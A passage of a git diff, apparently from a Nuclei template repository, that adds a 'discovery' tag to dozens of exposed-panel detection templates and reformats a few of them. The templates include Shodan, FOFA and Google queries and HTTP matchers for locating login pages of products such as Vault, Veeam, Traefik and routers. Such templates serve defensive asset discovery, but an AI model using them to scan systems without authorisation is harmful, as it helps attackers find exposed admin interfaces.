490a0046304402203ab326289da294d596ce788a55142539930c9d48d888fb5c3f2626fd49cfb0e1022052861ed9495f84d671a85641903509188afa4ebd0e78402f46dbf5f38e3b2090:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/tomcat/tomcat-exposed.yaml b/http/exposed-panels/tomcat/tomcat-exposed.yaml index d8d562585d6..3b363136dad 100644 --- a/http/exposed-panels/tomcat/tomcat-exposed.yaml +++ b/http/exposed-panels/tomcat/tomcat-exposed.yaml @@ -21,7 +21,7 @@ info: - body="apache tomcat" - title="apache tomcat" google-query: intitle:"apache tomcat" - tags: tomcat,panel,apache,detect + tags: tomcat,panel,apache,detect,discovery http: - method: GET diff --git a/http/exposed-panels/tooljet-panel.yaml b/http/exposed-panels/tooljet-panel.yaml index a871df1cf03..1910881e916 100644 --- a/http/exposed-panels/tooljet-panel.yaml +++ b/http/exposed-panels/tooljet-panel.yaml @@ -15,7 +15,7 @@ info: shodan-query: title:"ToolJet - Dashboard" product: tooljet vendor: tooljet - tags: panel,tooljet + tags: panel,tooljet,discovery http: - method: GET diff --git a/http/exposed-panels/tools4ever-ssrpm-panel.yaml b/http/exposed-panels/tools4ever-ssrpm-panel.yaml index c1e990c50eb..f3f8cc7bbe1 100644 --- a/http/exposed-panels/tools4ever-ssrpm-panel.yaml +++ b/http/exposed-panels/tools4ever-ssrpm-panel.yaml @@ -19,7 +19,7 @@ info: - "Set-Cookie: .SSRPMFORMSAUTH=;" reference: - https://www.tools4ever.com/ssrpm/ - tags: detect,panel,tools4ever + tags: detect,panel,tools4ever,discovery http: - method: GET diff --git a/http/exposed-panels/toshiba/topaccess-panel.yaml b/http/exposed-panels/toshiba/topaccess-panel.yaml index 7113d00fd55..57f73cc82b8 100644 --- a/http/exposed-panels/toshiba/topaccess-panel.yaml +++ b/http/exposed-panels/toshiba/topaccess-panel.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: title:"topaccess" - tags: topaccess,panel,login,detect + tags: topaccess,panel,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/total-web-solutions-panel.yaml b/http/exposed-panels/total-web-solutions-panel.yaml index 1ea43264d38..4eb362d1c6c 100644 --- a/http/exposed-panels/total-web-solutions-panel.yaml +++ b/http/exposed-panels/total-web-solutions-panel.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 google-query: intitle:"Total Web Solutions" + "Meter Name" - tags: panel,edb + tags: panel,edb,discovery http: - method: GET diff --git a/http/exposed-panels/totemomail-panel.yaml b/http/exposed-panels/totemomail-panel.yaml index d660b19799a..36f3610940b 100644 --- a/http/exposed-panels/totemomail-panel.yaml +++ b/http/exposed-panels/totemomail-panel.yaml @@ -21,7 +21,7 @@ info: - intext:"totemomail" inurl:responsiveui shodan-query: http.html:"totemomail" inurl:responsiveui fofa-query: body="totemomail" inurl:responsiveui - tags: totemomail,panel,totemo + tags: totemomail,panel,totemo,discovery http: - method: GET diff --git a/http/exposed-panels/tplink/tplink-r470t-panel.yaml b/http/exposed-panels/tplink/tplink-r470t-panel.yaml index 68127af00c4..23c2cf792aa 100644 --- a/http/exposed-panels/tplink/tplink-r470t-panel.yaml +++ b/http/exposed-panels/tplink/tplink-r470t-panel.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 2 shodan-query: "r470t" - tags: tplink,r470t,panel,login,detect + tags: tplink,r470t,panel,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/traccar-panel.yaml b/http/exposed-panels/traccar-panel.yaml index a0860873378..23ff8f28704 100644 --- a/http/exposed-panels/traccar-panel.yaml +++ b/http/exposed-panels/traccar-panel.yaml @@ -11,7 +11,7 @@ info: max-request: 1 fofa-query: app="Traccar" shodan-query: html:"Traccar" - tags: panel,login,traccar,detect + tags: panel,login,traccar,detect,discovery http: - method: GET diff --git a/http/exposed-panels/tracer-sc-login.yaml b/http/exposed-panels/tracer-sc-login.yaml index bef58265c68..f0cf3a49146 100644 --- a/http/exposed-panels/tracer-sc-login.yaml +++ b/http/exposed-panels/tracer-sc-login.yaml @@ -15,7 +15,7 @@ info: max-request: 1 vendor: trane product: tracer_sc - tags: tracer,trane,iot,panel,login + tags: tracer,trane,iot,panel,login,discovery http: - method: GET diff --git a/http/exposed-panels/traefik-dashboard.yaml b/http/exposed-panels/traefik-dashboard.yaml index a35cbf38194..618139c21c1 100644 --- a/http/exposed-panels/traefik-dashboard.yaml +++ b/http/exposed-panels/traefik-dashboard.yaml @@ -17,7 +17,7 @@ info: shodan-query: http.title:"traefik" fofa-query: title="traefik" google-query: intitle:"traefik" - tags: panel,traefik + tags: panel,traefik,discovery http: - method: GET diff --git a/http/exposed-panels/trellix-panel.yaml b/http/exposed-panels/trellix-panel.yaml index 3c088b3a41b..057e9149b3b 100644 --- a/http/exposed-panels/trellix-panel.yaml +++ b/http/exposed-panels/trellix-panel.yaml @@ -10,7 +10,7 @@ info: max-request: 1 shodan-query: "Server: Trellix" verified: true - tags: trellix,panel,login + tags: trellix,panel,login,discovery http: - method: GET diff --git a/http/exposed-panels/trendmicro-apexone-panel.yaml b/http/exposed-panels/trendmicro-apexone-panel.yaml index acc7e832b14..ce571bc574a 100644 --- a/http/exposed-panels/trendmicro-apexone-panel.yaml +++ b/http/exposed-panels/trendmicro-apexone-panel.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"officescan" - tags: panel,trendmicro,login,detect + tags: panel,trendmicro,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/trendnet/trendnet-tew827dru-login.yaml b/http/exposed-panels/trendnet/trendnet-tew827dru-login.yaml index 5efb354c21f..e140860a695 100644 --- a/http/exposed-panels/trendnet/trendnet-tew827dru-login.yaml +++ b/http/exposed-panels/trendnet/trendnet-tew827dru-login.yaml @@ -17,7 +17,7 @@ info: - http.html:"TEW-827DRU" - http.html:"tew-827dru" fofa-query: body="tew-827dru" - tags: panel,router,trendnet + tags: panel,router,trendnet,discovery http: - method: GET diff --git a/http/exposed-panels/truenas-scale-panel.yaml b/http/exposed-panels/truenas-scale-panel.yaml index 16122892dbb..071d0308556 100644 --- a/http/exposed-panels/truenas-scale-panel.yaml +++ b/http/exposed-panels/truenas-scale-panel.yaml @@ -19,7 +19,7 @@ info: - html:"TrueNAS" - http.html:"truenas" fofa-query: body="truenas" - tags: login,panel,truenas,ixsystems + tags: login,panel,truenas,ixsystems,discovery http: - method: GET diff --git a/http/exposed-panels/tufin-securetrack-login.yaml b/http/exposed-panels/tufin-securetrack-login.yaml index 9a590c090bb..30c219412cb 100644 --- a/http/exposed-panels/tufin-securetrack-login.yaml +++ b/http/exposed-panels/tufin-securetrack-login.yaml @@ -22,7 +22,7 @@ info: - intitle:"SecureTrack - Tufin Technologies" - intitle:"securetrack - tufin technologies" fofa-query: title="securetrack - tufin technologies" - tags: panel,tufin + tags: panel,tufin,discovery http: - method: GET diff --git a/http/exposed-panels/tup-openframe.yaml b/http/exposed-panels/tup-openframe.yaml index 51909e67bfa..37514f91e4d 100644 --- a/http/exposed-panels/tup-openframe.yaml +++ b/http/exposed-panels/tup-openframe.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:824580113 - tags: exposure,login,tup,openframe,panel + tags: exposure,login,tup,openframe,panel,discovery http: - method: GET diff --git a/http/exposed-panels/turnkey-lamp-panel.yaml b/http/exposed-panels/turnkey-lamp-panel.yaml index d4c5fc9dc6e..6740e5b545f 100644 --- a/http/exposed-panels/turnkey-lamp-panel.yaml +++ b/http/exposed-panels/turnkey-lamp-panel.yaml @@ -13,7 +13,7 @@ info: verified: true shodan-query: title:"TurnKey LAMP" fofa-query: title="TurnKey LAMP" - tags: panel,login,turnkey,lamp,detect + tags: panel,login,turnkey,lamp,detect,discovery http: - method: GET diff --git a/http/exposed-panels/turnkey-openvpn.yaml b/http/exposed-panels/turnkey-openvpn.yaml index d27a97a3be7..f56e9cf2172 100644 --- a/http/exposed-panels/turnkey-openvpn.yaml +++ b/http/exposed-panels/turnkey-openvpn.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"TurnKey OpenVPN" - tags: panel,openvpn,turnkey,webshell,vpn + tags: panel,openvpn,turnkey,webshell,vpn,discovery http: - method: GET diff --git a/http/exposed-panels/tuxedo-connected-controller.yaml b/http/exposed-panels/tuxedo-connected-controller.yaml index 17cbb6c2000..b1960e4e683 100644 --- a/http/exposed-panels/tuxedo-connected-controller.yaml +++ b/http/exposed-panels/tuxedo-connected-controller.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,tuxedo,edb + tags: panel,tuxedo,edb,discovery http: - method: GET diff --git a/http/exposed-panels/txadmin-panel.yaml b/http/exposed-panels/txadmin-panel.yaml index 9800eb3fb5e..55a85ebe9c3 100644 --- a/http/exposed-panels/txadmin-panel.yaml +++ b/http/exposed-panels/txadmin-panel.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 fofa-query: title="txAdmin Login" - tags: panel,login,txadmin,detect + tags: panel,login,txadmin,detect,discovery http: - method: GET diff --git a/http/exposed-panels/typo3-login.yaml b/http/exposed-panels/typo3-login.yaml index 4077ff68312..4f50391ef62 100644 --- a/http/exposed-panels/typo3-login.yaml +++ b/http/exposed-panels/typo3-login.yaml @@ -14,7 +14,7 @@ info: vendor: typo3 product: typo3 shodan-query: cpe:"cpe:2.3:a:typo3:typo3" - tags: panel,typo3 + tags: panel,typo3,discovery http: - method: GET diff --git a/http/exposed-panels/uipath-orchestrator-panel.yaml b/http/exposed-panels/uipath-orchestrator-panel.yaml index a0d5e3d2cbe..8bc698d3f68 100644 --- a/http/exposed-panels/uipath-orchestrator-panel.yaml +++ b/http/exposed-panels/uipath-orchestrator-panel.yaml @@ -16,7 +16,7 @@ info: vendor: uipath product: orchestrator shodan-query: http.title:"UiPath Orchestrator" - tags: panel,uipath,login,detect + tags: panel,uipath,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/umami-panel.yaml b/http/exposed-panels/umami-panel.yaml index 1d2e54a2b43..1d7305bec49 100644 --- a/http/exposed-panels/umami-panel.yaml +++ b/http/exposed-panels/umami-panel.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 3 shodan-query: http.favicon.hash:-130447705 - tags: panel,umami,login,detect + tags: panel,umami,login,detect,discovery flow: http(1) && http(2) diff --git a/http/exposed-panels/umbraco-login.yaml b/http/exposed-panels/umbraco-login.yaml index 02f93a54ef9..a7c8c04ed6f 100644 --- a/http/exposed-panels/umbraco-login.yaml +++ b/http/exposed-panels/umbraco-login.yaml @@ -21,7 +21,7 @@ info: - http.title:"umbraco" fofa-query: title="umbraco" google-query: intitle:"umbraco" - tags: panel,umbraco,detect + tags: panel,umbraco,detect,discovery http: - method: GET diff --git a/http/exposed-panels/unauth-xproxy-dashboard.yaml b/http/exposed-panels/unauth-xproxy-dashboard.yaml index dd0843e8d0d..3c6c77849d7 100644 --- a/http/exposed-panels/unauth-xproxy-dashboard.yaml +++ b/http/exposed-panels/unauth-xproxy-dashboard.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 fofa-query: X-Proxy Dashboard - tags: xproxy,panel + tags: xproxy,panel,discovery http: - method: GET diff --git a/http/exposed-panels/unauth/tautulli-unauth.yaml b/http/exposed-panels/unauth/tautulli-unauth.yaml index 9f27cd4ef51..1b589723ce5 100644 --- a/http/exposed-panels/unauth/tautulli-unauth.yaml +++ b/http/exposed-panels/unauth/tautulli-unauth.yaml @@ -21,7 +21,7 @@ info: google-query: - intitle:"tautulli" - intitle:"tautulli - home" - tags: panel,misconfig,tautulli,unauth,exposure + tags: panel,misconfig,tautulli,unauth,exposure,discovery http: - method: GET diff --git a/http/exposed-panels/unauthenticated-frp.yaml b/http/exposed-panels/unauthenticated-frp.yaml index d268585470f..0d831cb0333 100644 --- a/http/exposed-panels/unauthenticated-frp.yaml +++ b/http/exposed-panels/unauthenticated-frp.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: frp,unauth,panel + tags: frp,unauth,panel,discovery http: - method: GET diff --git a/http/exposed-panels/unibox-panel.yaml b/http/exposed-panels/unibox-panel.yaml index 75e3badfc16..0f2199d07e5 100644 --- a/http/exposed-panels/unibox-panel.yaml +++ b/http/exposed-panels/unibox-panel.yaml @@ -13,7 +13,7 @@ info: vendor: indionetworks product: unibox shodan-query: http.favicon.hash:176427349 - tags: panel,unibox,login + tags: panel,unibox,login,discovery http: - method: GET diff --git a/http/exposed-panels/unifi-panel.yaml b/http/exposed-panels/unifi-panel.yaml index bce5837ffd6..eab4fb826e2 100644 --- a/http/exposed-panels/unifi-panel.yaml +++ b/http/exposed-panels/unifi-panel.yaml @@ -14,7 +14,7 @@ info: shodan-query: http.title:"UniFi Network" product: unifi_network_application vendor: ui - tags: unifi,ubnt,panel + tags: unifi,ubnt,panel,discovery http: - method: GET diff --git a/http/exposed-panels/unleash-panel.yaml b/http/exposed-panels/unleash-panel.yaml index ef3f6ceca6b..3f46e189c05 100644 --- a/http/exposed-panels/unleash-panel.yaml +++ b/http/exposed-panels/unleash-panel.yaml @@ -1,5 +1,5 @@ -id: unleash-panel - +id: unleash-panel + info: name: Unleash Panel - Detect author: userdehghani @@ -12,29 +12,29 @@ info: verified: true max-request: 3 shodan-query: http.favicon.hash:-608690655 - tags: panel,unleash,login,detect + tags: panel,unleash,login,detect,discovery -http: - - method: GET - path: - - "{{BaseURL}}/login" - - "{{BaseURL}}/sign-in" - - "{{BaseURL}}/favicon.ico" - - stop-at-first-match: true - matchers-condition: or - matchers: - - type: word - part: body - words: - - '<title>Unleash' - - 'content="unleash' - - 'alt="getunleash' - - 'Sign-in - Unleash hosted' - case-insensitive: true - condition: or - - - type: dsl - dsl: +http: + - method: GET + path: + - "{{BaseURL}}/login" + - "{{BaseURL}}/sign-in" + - "{{BaseURL}}/favicon.ico" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: body + words: + - '<title>Unleash' + - 'content="unleash' + - 'alt="getunleash' + - 'Sign-in - Unleash hosted' + case-insensitive: true + condition: or + + - type: dsl + dsl: - "status_code==200 && (\"-608690655\" == mmh3(base64_py(body)))" # digest: 4b0a00483046022100d8f9dd66d9a2be7b35c2a5f48b0a25967a65044211ac2f21bbd7b7b32cbd35a6022100b87d27c1550d5469fdcb54b9fdb2e66c78e34d7ede55749c74fe817d1da29cd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/untangle-admin-login.yaml b/http/exposed-panels/untangle-admin-login.yaml index fff7b8cae34..c288794e985 100644 --- a/http/exposed-panels/untangle-admin-login.yaml +++ b/http/exposed-panels/untangle-admin-login.yaml @@ -22,7 +22,7 @@ info: - http.title:"untangle administrator login" fofa-query: title="untangle administrator login" google-query: intitle:"untangle administrator login" - tags: panel,untangle,admin,login + tags: panel,untangle,admin,login,discovery http: - method: GET diff --git a/http/exposed-panels/uptime-kuma-panel.yaml b/http/exposed-panels/uptime-kuma-panel.yaml index 978be7e8aaf..eb741fd802e 100644 --- a/http/exposed-panels/uptime-kuma-panel.yaml +++ b/http/exposed-panels/uptime-kuma-panel.yaml @@ -17,7 +17,7 @@ info: vendor: uptime.kuma product: uptime_kuma shodan-query: title:"Uptime Kuma" - tags: uptime,kuma,panel,login,detect + tags: uptime,kuma,panel,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/urbackup-panel.yaml b/http/exposed-panels/urbackup-panel.yaml index cf1bf8c45fb..94bfae74a75 100644 --- a/http/exposed-panels/urbackup-panel.yaml +++ b/http/exposed-panels/urbackup-panel.yaml @@ -12,7 +12,7 @@ info: vendor: urbackup product: urbackup shodan-query: html:"UrBackup - Keeps your data safe" - tags: urbackup,panel,login,detect + tags: urbackup,panel,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/user-control-panel.yaml b/http/exposed-panels/user-control-panel.yaml index 3851dc2ca6c..463ce2e1130 100644 --- a/http/exposed-panels/user-control-panel.yaml +++ b/http/exposed-panels/user-control-panel.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: title:"User Control Panel" - tags: panel,ucp + tags: panel,ucp,discovery http: - method: GET diff --git a/http/exposed-panels/usergate-ngfw-admin-panel.yaml b/http/exposed-panels/usergate-ngfw-admin-panel.yaml index 97980acb42d..ac682e5a233 100644 --- a/http/exposed-panels/usergate-ngfw-admin-panel.yaml +++ b/http/exposed-panels/usergate-ngfw-admin-panel.yaml @@ -10,7 +10,7 @@ info: max-request: 2 shodan-query: "Server: UserGate-UTM/42" fofa-query: icon_hash="-782553370" - tags: detect,panel,usergate,ngfw,utm + tags: detect,panel,usergate,ngfw,utm,discovery http: - method: GET diff --git a/http/exposed-panels/usermin-panel.yaml b/http/exposed-panels/usermin-panel.yaml index f131c00f5e7..301ae097fa2 100644 --- a/http/exposed-panels/usermin-panel.yaml +++ b/http/exposed-panels/usermin-panel.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 fofa-query: "Login to Usermin" - tags: panel,login,usermin,detect + tags: panel,login,usermin,detect,discovery http: - method: GET diff --git a/http/exposed-panels/v2924-admin-panel.yaml b/http/exposed-panels/v2924-admin-panel.yaml index 07d9ceb6413..3d15ea27522 100644 --- a/http/exposed-panels/v2924-admin-panel.yaml +++ b/http/exposed-panels/v2924-admin-panel.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 shodan-query: title:"V2924" - tags: panel,v2924 + tags: panel,v2924,discovery http: - method: GET diff --git a/http/exposed-panels/vault-panel.yaml b/http/exposed-panels/vault-panel.yaml index 1414b855cb2..d62b5e01133 100644 --- a/http/exposed-panels/vault-panel.yaml +++ b/http/exposed-panels/vault-panel.yaml @@ -20,7 +20,7 @@ info: product: vault shodan-query: http.favicon.hash:-919788577 fofa-query: icon_hash=-919788577 - tags: panel,vault,detect,hashicorp + tags: panel,vault,detect,hashicorp,discovery http: - method: GET diff --git a/http/exposed-panels/vaultwarden-panel.yaml b/http/exposed-panels/vaultwarden-panel.yaml index 7633ceceea6..3c42b9c2a20 100644 --- a/http/exposed-panels/vaultwarden-panel.yaml +++ b/http/exposed-panels/vaultwarden-panel.yaml @@ -12,7 +12,7 @@ info: max-request: 1 verified: true shodan-query: http.html:"vaultwarden" - tags: panel,vaultwarden,login + tags: panel,vaultwarden,login,discovery http: - method: GET diff --git a/http/exposed-panels/vectoradmin-panel.yaml b/http/exposed-panels/vectoradmin-panel.yaml index f1df6ddf405..a46440e0dfb 100644 --- a/http/exposed-panels/vectoradmin-panel.yaml +++ b/http/exposed-panels/vectoradmin-panel.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 fofa-query: title=="VectorAdmin - Vector database management made easy." - tags: panel,login,vectoradmin,detect + tags: panel,login,vectoradmin,detect,discovery http: - method: GET diff --git a/http/exposed-panels/veeam-backup-azure-panel.yaml b/http/exposed-panels/veeam-backup-azure-panel.yaml index b3736f9579e..e46550ef5af 100644 --- a/http/exposed-panels/veeam-backup-azure-panel.yaml +++ b/http/exposed-panels/veeam-backup-azure-panel.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: title:"Veeam Backup for Microsoft Azure" - tags: azure,panel,backup,veeam,microsoft + tags: azure,panel,backup,veeam,microsoft,discovery http: - method: GET diff --git a/http/exposed-panels/veeam-backup-gcp.yaml b/http/exposed-panels/veeam-backup-gcp.yaml index 7461cb30eae..6c87d3ca3cb 100644 --- a/http/exposed-panels/veeam-backup-gcp.yaml +++ b/http/exposed-panels/veeam-backup-gcp.yaml @@ -15,7 +15,7 @@ info: shodan-query: title:"Veeam Backup for GCP" product: veeam_backup_for_google_cloud vendor: veeam - tags: panel,google,cloud + tags: panel,google,cloud,discovery http: - method: GET diff --git a/http/exposed-panels/veeam-backup-manager-login.yaml b/http/exposed-panels/veeam-backup-manager-login.yaml index 8d5ea3e70e0..400b8b41592 100644 --- a/http/exposed-panels/veeam-backup-manager-login.yaml +++ b/http/exposed-panels/veeam-backup-manager-login.yaml @@ -19,7 +19,7 @@ info: fofa-query: - title="veeam backup enterprise manager" - icon_hash="169658321" - tags: veeam,panel,enterprise-manager,login,detect + tags: veeam,panel,enterprise-manager,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/veeam-panel.yaml b/http/exposed-panels/veeam-panel.yaml index 3b54e9a395d..0f15852fb51 100644 --- a/http/exposed-panels/veeam-panel.yaml +++ b/http/exposed-panels/veeam-panel.yaml @@ -15,7 +15,7 @@ info: shodan-query: http.favicon.hash:-633512412 vendor: veeam verified: true - tags: panel,veeam + tags: panel,veeam,discovery http: - method: GET diff --git a/http/exposed-panels/veracore-panel.yaml b/http/exposed-panels/veracore-panel.yaml index 441ca3c49aa..573840b1d09 100644 --- a/http/exposed-panels/veracore-panel.yaml +++ b/http/exposed-panels/veracore-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 1 shodan-query: html:"veraCoreScreenHeight" fofa-query: body="veraCoreScreenHeight" - tags: panel,veracore,login,detect + tags: panel,veracore,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/veritas-netbackup-panel.yaml b/http/exposed-panels/veritas-netbackup-panel.yaml index fa199fb457a..44426edd021 100644 --- a/http/exposed-panels/veritas-netbackup-panel.yaml +++ b/http/exposed-panels/veritas-netbackup-panel.yaml @@ -1,32 +1,32 @@ -id: veritas-netbackup-panel - -info: - name: Veritas NetBackup OpsCenter Analytics Login - Detect - author: rxerium - severity: info - description: | - A Veritas NetBackup OpsCenter Analytics page was detected. - reference: - - https://www.veritas.com/ - metadata: - verified: true - max-request: 1 - shodan-query: html:"Veritas NetBackup OpsCenter Analytics" - tags: panel,veritas,netbackup,opscenter,login,detect - -http: - - method: GET - path: - - "{{BaseURL}}/opscenter/" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '<title>Veritas NetBackup OpsCenter Analytics' - - - type: status - status: +id: veritas-netbackup-panel + +info: + name: Veritas NetBackup OpsCenter Analytics Login - Detect + author: rxerium + severity: info + description: | + A Veritas NetBackup OpsCenter Analytics page was detected. + reference: + - https://www.veritas.com/ + metadata: + verified: true + max-request: 1 + shodan-query: html:"Veritas NetBackup OpsCenter Analytics" + tags: panel,veritas,netbackup,opscenter,login,detect,discovery + +http: + - method: GET + path: + - "{{BaseURL}}/opscenter/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '<title>Veritas NetBackup OpsCenter Analytics' + + - type: status + status: - 200 # digest: 4a0a00473045022100defdbb284f114812b250e9dbef83fbc6031dfea73c8222f503d785f25848bd5602200c8a32ed85d58b1ae9b121ddeed138844a93c957ae37ecceacd0560e634992a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/veriz0wn-osint.yaml b/http/exposed-panels/veriz0wn-osint.yaml index 1ee303d0397..2391bef1c20 100644 --- a/http/exposed-panels/veriz0wn-osint.yaml +++ b/http/exposed-panels/veriz0wn-osint.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 1 shodan-query: title:"Veriz0wn" - tags: veriz0wn,panel + tags: veriz0wn,panel,discovery http: - method: GET diff --git a/http/exposed-panels/verizon-router-panel.yaml b/http/exposed-panels/verizon-router-panel.yaml index aec7db82086..37749611ec1 100644 --- a/http/exposed-panels/verizon-router-panel.yaml +++ b/http/exposed-panels/verizon-router-panel.yaml @@ -15,7 +15,7 @@ info: shodan-query: http.title:"Verizon Router" product: fios_actiontec_mi424wr-gen31_router_firmware vendor: verizon - tags: panel,verizon,router + tags: panel,verizon,router,discovery http: - method: GET diff --git a/http/exposed-panels/versa/versa-director-login.yaml b/http/exposed-panels/versa/versa-director-login.yaml index 062ec7a6007..c89460faea0 100644 --- a/http/exposed-panels/versa/versa-director-login.yaml +++ b/http/exposed-panels/versa/versa-director-login.yaml @@ -22,7 +22,7 @@ info: - "Set-Cookie: VD-CSRF-TOKEN" product: versa_director vendor: versa-networks - tags: panel,versa,director + tags: panel,versa,director,discovery http: - method: GET diff --git a/http/exposed-panels/versa/versa-flexvnf-panel.yaml b/http/exposed-panels/versa/versa-flexvnf-panel.yaml index d5f91eeb189..fb0dd2bf6d0 100644 --- a/http/exposed-panels/versa/versa-flexvnf-panel.yaml +++ b/http/exposed-panels/versa/versa-flexvnf-panel.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Flex VNF Web-UI" - tags: panel,versa,flexvnf + tags: panel,versa,flexvnf,discovery http: - method: GET diff --git a/http/exposed-panels/versa/versa-sdwan.yaml b/http/exposed-panels/versa/versa-sdwan.yaml index 0d7f567840f..e8014ade548 100644 --- a/http/exposed-panels/versa/versa-sdwan.yaml +++ b/http/exposed-panels/versa/versa-sdwan.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,versa,sdwan + tags: panel,versa,sdwan,discovery http: - method: GET diff --git a/http/exposed-panels/vertex-tax-panel.yaml b/http/exposed-panels/vertex-tax-panel.yaml index 64ce9b29b16..c3d6f2f5bfa 100644 --- a/http/exposed-panels/vertex-tax-panel.yaml +++ b/http/exposed-panels/vertex-tax-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.html:"Vertex Tax Installer" - tags: panel,vertex + tags: panel,vertex,discovery http: - method: GET diff --git a/http/exposed-panels/vidyo-login.yaml b/http/exposed-panels/vidyo-login.yaml index 8c66a424153..dd634f4baa1 100644 --- a/http/exposed-panels/vidyo-login.yaml +++ b/http/exposed-panels/vidyo-login.yaml @@ -14,7 +14,7 @@ info: shodan-query: http.favicon.hash:-1970367401 product: vidyo vendor: vidyo - tags: panel,vidyo + tags: panel,vidyo,discovery http: - method: GET diff --git a/http/exposed-panels/vigor-login.yaml b/http/exposed-panels/vigor-login.yaml index 06eb25e0e72..d3912561841 100644 --- a/http/exposed-panels/vigor-login.yaml +++ b/http/exposed-panels/vigor-login.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,login,edb + tags: panel,login,edb,discovery http: - method: GET diff --git a/http/exposed-panels/vince-panel.yaml b/http/exposed-panels/vince-panel.yaml index de21ca41c49..5bc356a4652 100644 --- a/http/exposed-panels/vince-panel.yaml +++ b/http/exposed-panels/vince-panel.yaml @@ -1,28 +1,28 @@ -id: vince-panel - -info: - name: Vince Login Panel - Detect - author: righettod - severity: info - description: | - Vince products was detected. - reference: - - https://github.com/vinceanalytics/vince - - https://www.vinceanalytics.com/ - metadata: - max-request: 1 - verified: true - tags: panel,vince,login - -http: - - method: GET - path: - - "{{BaseURL}}/login" - - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains_any(to_lower(body), "vince - high performance", "vince · open source web", "Welcome to Vince")' +id: vince-panel + +info: + name: Vince Login Panel - Detect + author: righettod + severity: info + description: | + Vince products was detected. + reference: + - https://github.com/vinceanalytics/vince + - https://www.vinceanalytics.com/ + metadata: + max-request: 1 + verified: true + tags: panel,vince,login,discovery + +http: + - method: GET + path: + - "{{BaseURL}}/login" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "vince - high performance", "vince · open source web", "Welcome to Vince")' condition: and # digest: 4a0a00473045022100965ebab45e023bd8dae214bfe349a9283ce6445085b52c5ee25dfdd8c772b36802201dd7fabfb4b6dda61cc2623bf4f034ff59249f5e1f45d57e5a5f0e08e6497a63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/vinchin-panel.yaml b/http/exposed-panels/vinchin-panel.yaml index 002eabc2552..6ddc78a7992 100644 --- a/http/exposed-panels/vinchin-panel.yaml +++ b/http/exposed-panels/vinchin-panel.yaml @@ -14,7 +14,7 @@ info: shodan-query: html:"VinChin" product: vinchin_backup_and_recovery vendor: vinchin - tags: panel,vinchin,login + tags: panel,vinchin,login,discovery http: - method: GET diff --git a/http/exposed-panels/virtua-software-panel.yaml b/http/exposed-panels/virtua-software-panel.yaml index dc8b7fae954..08dfcf37582 100644 --- a/http/exposed-panels/virtua-software-panel.yaml +++ b/http/exposed-panels/virtua-software-panel.yaml @@ -16,7 +16,7 @@ info: product: cobranca shodan-query: http.favicon.hash:876876147 fofa-query: icon_hash=876876147 - tags: panel,virtua,virtuasoftware + tags: panel,virtua,virtuasoftware,discovery http: - method: GET diff --git a/http/exposed-panels/virtual-ema-detect.yaml b/http/exposed-panels/virtual-ema-detect.yaml index a7ea6a80ba8..5c17d83a0f5 100644 --- a/http/exposed-panels/virtual-ema-detect.yaml +++ b/http/exposed-panels/virtual-ema-detect.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 2 - tags: panel,ems + tags: panel,ems,discovery http: - method: GET diff --git a/http/exposed-panels/vistaweb-panel.yaml b/http/exposed-panels/vistaweb-panel.yaml index 9bac8d9689d..64ff2182dae 100644 --- a/http/exposed-panels/vistaweb-panel.yaml +++ b/http/exposed-panels/vistaweb-panel.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: panel,vistaweb,login + tags: panel,vistaweb,login,discovery http: - method: GET diff --git a/http/exposed-panels/vmware-aria-panel.yaml b/http/exposed-panels/vmware-aria-panel.yaml index faab263cd77..2ae8861e2ee 100644 --- a/http/exposed-panels/vmware-aria-panel.yaml +++ b/http/exposed-panels/vmware-aria-panel.yaml @@ -1,30 +1,30 @@ -id: vmware-aria-panel - -info: - name: VMware Aria Operations Login - Detect - author: rxerium - severity: info - description: | - Detects VMware Aria Operations Panel. - metadata: - verified: true - max-request: 1 - shodan-query: title:"VMware Aria Operations" - tags: panel,aria,login,detect - -http: - - method: GET - path: - - 